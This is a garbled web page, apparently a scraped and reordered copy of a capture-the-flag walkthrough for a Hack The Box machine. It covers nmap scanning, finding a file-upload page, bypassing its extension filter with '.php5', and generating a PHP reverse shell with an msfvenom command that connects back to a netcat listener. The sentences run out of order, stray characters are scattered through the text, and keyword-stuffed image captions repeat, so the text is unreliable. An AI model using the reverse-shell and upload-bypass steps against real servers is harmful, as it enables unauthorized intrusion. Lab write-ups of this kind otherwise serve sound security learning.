The parameters just mean listen with verbose output on port. We can set up our netcat listener like this:
![netcat reverse shell without e over vpn netcat reverse shell without e over vpn](https://img.game-news24.com/2021/10/Twitter-Now-Allows-Everyone-to-Remove-Followers-Without-Knowing-About.jpeg)
LPORT= specifies the port to connect to, on which we later have to listenĪs msfvenom normally prints the result to stdout, > my_shell.php5 conveniently redirects the output into a file called “my_shell.php5” for us to use. LHOST= specifies which IP the shell should connect to, which means we have to put our own IP here
Netcat reverse shell without e over vpn code#
f raw specifies the format of the shellcode, in this case we just want the raw php code p php/reverse_php specified which payload we want to use – in this case a simple reverse shell Would create a payload that can be listened to with netcat. Msfvenom -p php/reverse_php -f raw LHOST= LPORT= > my_shell.php5 For a reverse shell, a command like this: It’s definitely a good skill to have to be able to write your own shellcode, but depending on what you want to achieve, the immense convenience tools like msfvenom provide should not be neglected, either. We can write our own shellcode, pull it from exploit-db or just generate it using msfvenom. First, we created a malicious PHP file that grants us a shell. Let’s just go over some of the details of what just happened. For this, we can take a step back and try the obvious first: /sparklays/design/uploads seems like a directory that could potentially contain the uploaded files, so /sparklays/design/uploads/my_shell.php5 should do what we want (Spoiler Alert: it does). (The listener obviously becomes obsolete if we go with a webshell instead of a reverse shell). netcat or Metasploit‘s /exploits/multi/handler) and execute the uploaded file somehow to get a shell. The only thing left now is to set up a listener (e.g.
![netcat reverse shell without e over vpn netcat reverse shell without e over vpn](https://1.bp.blogspot.com/-zp7R14zpgmw/X_xg4zyfJlI/AAAAAAAA9t8/VEeKyUuePa4ZIYtch9fMCmm1xLgWE5rXwCLcBGAsYHQ/s1920/all-about-shell.png)
With some knowledge about bypassing such upload filters we eventually get to upload a file called “my_shell.php5”. Trying to upload a file like “my_shell.php” will result in the website responding with “I’m sorry, Dave, I can’t let you do that” “sorry that file type is not allowed”. The experienced hacker will instantly know that this is a possible vector, with the possibilities of uploading webshells, reverse shells or other malicious files. If we browse to /sparklays/design/changelogo.php, we will find an option to upload files. This gives us a starting point to bruteforce, and if we do, we will quickly find the subdirectory /sparklays/design with the pages /sparklays/design/design.html and /sparklays/design/changelogo.php as well as the subdirectory /sparklays/design/uploads. We COULD boot up dirbuster (or similar) and try to bruteforce the subdirectories, but why not go with that’s presented to us? Browsing to /slowdaddy leaves us with a 404, but /sparklays gives us a 403 – that means, /slowdaddy does not exist, but /sparklays does, we just don’t have the required permissions (yet) to access it. “We are proud to announce our first client: Sparklays” Just browsing to the root directory gives us some text. SSH is not a very good initial attack vector in most cases, so let’s take a look at Port 80.
![netcat reverse shell without e over vpn netcat reverse shell without e over vpn](https://image.slidesharecdn.com/modulmetasploit-170216040623/95/modul-metasploit-4-638.jpg)
Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel |_http-title: Site doesn't have a title (text/html charset=UTF-8). |_http-server-header: Apache/2.4.18 (Ubuntu) So, let’s start with the obvious first step: nmap.Ģ2/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux protocol 2.0) It was a great learning experience for me, I especially learned a lot about netcat and networking in general. The “theme” of this box was tunneling, in the several forms it appears. To be honest, I even liked it more than my previous favorite, “Active”.